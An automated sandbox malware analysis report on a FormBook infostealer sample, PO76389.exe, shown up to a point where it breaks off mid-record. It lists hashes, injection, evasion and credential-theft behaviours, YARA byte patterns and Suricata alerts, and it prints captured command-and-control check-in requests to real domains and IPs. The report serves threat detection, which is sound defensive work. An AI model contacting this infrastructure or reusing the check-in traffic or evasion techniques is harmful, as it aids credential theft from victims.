Windows Analysis Report
PO76389.exe

Overview

General Information

Sample name: PO76389.exe
Analysis ID: 1511731
MD5: f28830224d4ed5b9b9b16fb45d5fd569
SHA1: 1cefa43bae388468b9a931ec31f49248711de624
SHA256: 5cf70c937525b712b048b9196182e3a1a988d2f112d8b7647773bcd0db23101d
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO76389.exe (PID: 4028 cmdline: "C:\Users\user\Desktop\PO76389.exe" MD5: F28830224D4ED5B9B9B16FB45D5FD569)
    • svchost.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\PO76389.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • TrBUxuahdhJ.exe (PID: 2556 cmdline: "C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6000 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • TrBUxuahdhJ.exe (PID: 2796 cmdline: "C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x3edbf:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x26fbe:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(11 further entries not shown)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.2520000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.2520000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.2520000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.2520000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\PO76389.exe", CommandLine: "C:\Users\user\Desktop\PO76389.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO76389.exe", ParentImage: C:\Users\user\Desktop\PO76389.exe, ParentProcessId: 4028, ParentProcessName: PO76389.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO76389.exe", ProcessId: 6388, ProcessName: svchost.exe
            Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\PO76389.exe", CommandLine: "C:\Users\user\Desktop\PO76389.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO76389.exe", ParentImage: C:\Users\user\Desktop\PO76389.exe, ParentProcessId: 4028, ParentProcessName: PO76389.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO76389.exe", ProcessId: 6388, ProcessName: svchost.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-16T09:38:08.414020+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 3.33.130.190 | 80 | TCP
            2024-09-16T09:38:32.474744+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 13.228.81.39 | 80 | TCP
            2024-09-16T09:39:06.757238+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49720 | 66.81.203.200 | 80 | TCP
            2024-09-16T09:39:20.746616+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 103.42.108.46 | 80 | TCP
            2024-09-16T09:39:36.928247+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49728 | 3.33.130.190 | 80 | TCP
            2024-09-16T09:39:58.290494+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 199.59.243.226 | 80 | TCP
            2024-09-16T09:40:11.717811+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 162.0.239.141 | 80 | TCP
            2024-09-16T09:40:33.098500+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 84.32.84.32 | 80 | TCP
            2024-09-16T09:40:55.803698+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49744 | 154.23.176.197 | 80 | TCP
            2024-09-16T09:41:09.876720+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49748 | 62.149.128.40 | 80 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-16T09:38:24.846707+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 13.228.81.39 | 80 | TCP
            2024-09-16T09:38:27.367662+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 13.228.81.39 | 80 | TCP
            2024-09-16T09:38:29.944838+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 13.228.81.39 | 80 | TCP
            2024-09-16T09:38:39.260384+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 66.81.203.200 | 80 | TCP
            2024-09-16T09:38:41.807298+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49718 | 66.81.203.200 | 80 | TCP
            2024-09-16T09:38:44.354147+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49719 | 66.81.203.200 | 80 | TCP
            2024-09-16T09:39:13.080520+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 103.42.108.46 | 80 | TCP
            2024-09-16T09:39:15.619923+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 103.42.108.46 | 80 | TCP
            2024-09-16T09:39:18.184785+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49723 | 103.42.108.46 | 80 | TCP
            2024-09-16T09:39:26.244471+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 3.33.130.190 | 80 | TCP
            2024-09-16T09:39:29.854942+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49726 | 3.33.130.190 | 80 | TCP
            2024-09-16T09:39:31.392341+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49727 | 3.33.130.190 | 80 | TCP
            2024-09-16T09:39:50.728486+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49729 | 199.59.243.226 | 80 | TCP
            2024-09-16T09:39:53.196514+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49730 | 199.59.243.226 | 80 | TCP
            2024-09-16T09:39:55.749004+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49731 | 199.59.243.226 | 80 | TCP
            2024-09-16T09:40:04.087002+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 162.0.239.141 | 80 | TCP
            2024-09-16T09:40:07.557349+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49734 | 162.0.239.141 | 80 | TCP
            2024-09-16T09:40:10.104368+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 162.0.239.141 | 80 | TCP
            2024-09-16T09:40:25.435088+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 84.32.84.32 | 80 | TCP
            2024-09-16T09:40:27.962763+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 84.32.84.32 | 80 | TCP
            2024-09-16T09:40:30.536274+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49739 | 84.32.84.32 | 80 | TCP
            2024-09-16T09:40:48.170963+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 154.23.176.197 | 80 | TCP
            2024-09-16T09:40:50.724097+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49742 | 154.23.176.197 | 80 | TCP
            2024-09-16T09:40:53.451273+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49743 | 154.23.176.197 | 80 | TCP
            2024-09-16T09:41:02.161582+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49745 | 62.149.128.40 | 80 | TCP
            2024-09-16T09:41:04.709926+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49746 | 62.149.128.40 | 80 | TCP
            2024-09-16T09:41:07.236054+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49747 | 62.149.128.40 | 80 | TCP

            AV Detection

            Source: PO76389.exe; ReversingLabs: Detection: 76%
            Source: PO76389.exe; Virustotal: Detection: 73%
            Source: Yara match; File source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
            Source: PO76389.exe; Joe Sandbox ML: detected
            Source: PO76389.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TrBUxuahdhJ.exe, 00000004.00000002.4568774085.000000000092E000.00000002.00000001.01000000.00000005.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4568123137.000000000092E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO76389.exe, 00000000.00000003.2095622015.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, PO76389.exe, 00000000.00000003.2095758118.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2436241382.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438409561.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2532291355.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2535225271.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.0000000002F60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO76389.exe, 00000000.00000003.2095622015.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, PO76389.exe, 00000000.00000003.2095758118.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2436241382.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438409561.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.4569857221.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2532291355.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2535225271.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.0000000002F60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2532476916.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500493554.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000003.2467006248.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2532476916.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500493554.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000003.2467006248.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_004CDD92 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004CDD92
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_00502044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00502044
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_0050219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0050219F
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_005024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_005024A9
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_004F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_004F6B3F
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_004F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_004F6E4A
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_004FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_004FF350
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_004FFD47 FindFirstFileW,FindClose, 0_2_004FFD47
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_004FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004FFDD2
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 5_2_0061C0D0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0061C0D0
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then xor eax, eax 5_2_00609B60
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then mov ebx, 00000004h 5_2_02CA04DF

            Networking

            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 162.0.239.141:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 62.149.128.40:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 13.228.81.39:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 162.0.239.141:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 66.81.203.200:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49713 -> 13.228.81.39:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 62.149.128.40:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49736 -> 162.0.239.141:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 103.42.108.46:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 3.33.130.190:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49727 -> 3.33.130.190:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 3.33.130.190:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49715 -> 13.228.81.39:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 154.23.176.197:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49722 -> 103.42.108.46:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 199.59.243.226:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49712 -> 3.33.130.190:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49720 -> 66.81.203.200:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 199.59.243.226:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49740 -> 84.32.84.32:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 162.0.239.141:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49716 -> 13.228.81.39:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 84.32.84.32:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49744 -> 154.23.176.197:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 66.81.203.200:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49728 -> 3.33.130.190:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49748 -> 62.149.128.40:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 199.59.243.226:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49724 -> 103.42.108.46:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 84.32.84.32:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49723 -> 103.42.108.46:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 84.32.84.32:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 154.23.176.197:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 62.149.128.40:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 66.81.203.200:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 154.23.176.197:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49732 -> 199.59.243.226:80
            Source: DNS query: www.personal-loans-jp8.xyz
            Source: DNS query: www.quantumnests.xyz
            Source: DNS query: www.siyue.xyz
            Source: Joe Sandbox View; IP Address: 62.149.128.40
            Source: Joe Sandbox View; IP Address: 162.0.239.141
            Source: Joe Sandbox View; ASN Name: ARUBA-ASNIT
            Source: Joe Sandbox View; ASN Name: NAMECHEAP-NETUS
            Source: Joe Sandbox View; ASN Name: BODIS-NJUS
            Source: Joe Sandbox View; ASN Name: NTT-LT-ASLT
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO76389.exe; Code function: 0_2_0050550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_0050550C
            Source: global traffic; HTTP traffic detected:
              GET /gqyt/?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.chamadaslotgiris.net
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
              GET /p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
              GET /osde/?prutfR_P=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&u8b=M0MH_xux6 HTTP/1.1
              Host: www.mediaplug.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
